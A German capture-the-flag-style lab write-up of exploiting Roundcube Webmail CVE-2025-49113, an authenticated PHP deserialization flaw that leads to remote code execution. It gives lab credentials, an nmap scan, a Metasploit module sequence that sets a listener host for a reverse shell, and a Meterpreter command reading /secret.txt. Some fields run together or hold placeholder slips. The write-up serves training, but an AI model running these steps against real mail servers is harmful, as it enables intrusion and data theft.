
Praktisches Exploitation-Labor für Roundcube Webmail CVE-2025-49113 (authentifizierte PHP-Objektdeserialisierung → RCE) zum Lesen von /secret.txt.
HAFTUNGSAUSSCHLUSS: Nur für Bildungszwecke
Dieses Repository dokumentiert meine schrittweise Ausnutzung von Roundcube Webmail CVE-2025-49113 in einer kontrollierten Laborumgebung, um das in /secret.txt gespeicherte Geheimnis zu erlangen.
⚠️ Haftungsausschluss
Alle Arbeiten wurden gegen eine Labor-/Trainingsumgebung durchgeführt, die ich testen darf.
Verwenden Sie diese Techniken nicht gegen Systeme, die Sie nicht besitzen oder verwalten.
Roundcube Webmail ist ein browserbasierter Open-Source-PHP-E-Mail-Client, der über IMAP eine Verbindung zu Postfächern herstellt und E-Mails über SMTP versendet. Er läuft üblicherweise auf Apache oder Nginx mit MySQL/PostgreSQL/SQLite und wird häufig in Shared-Hosting-Umgebungen eingesetzt.
Schwachstelle – CVE-2025-49113
Alle Roundcube-Versionen bis einschließlich 1.6.10 (und 1.5.x vor 1.5.10) enthalten einen kritischen Fehler in program/actions/settings/upload.php. Der Parameter _from wird nicht ordnungsgemäß validiert, wodurch ein authentifizierter Angreifer eine unsichere PHP-Objekt-Deserialisierung auslösen und Remote Code Execution mit den Rechten des Webservers erreichen kann.
Lab-Zugangsdaten:
roundcubercpassZiel:
Wie lautet das Geheimnis in der Datei
/secret.txt?
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113Befehl: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt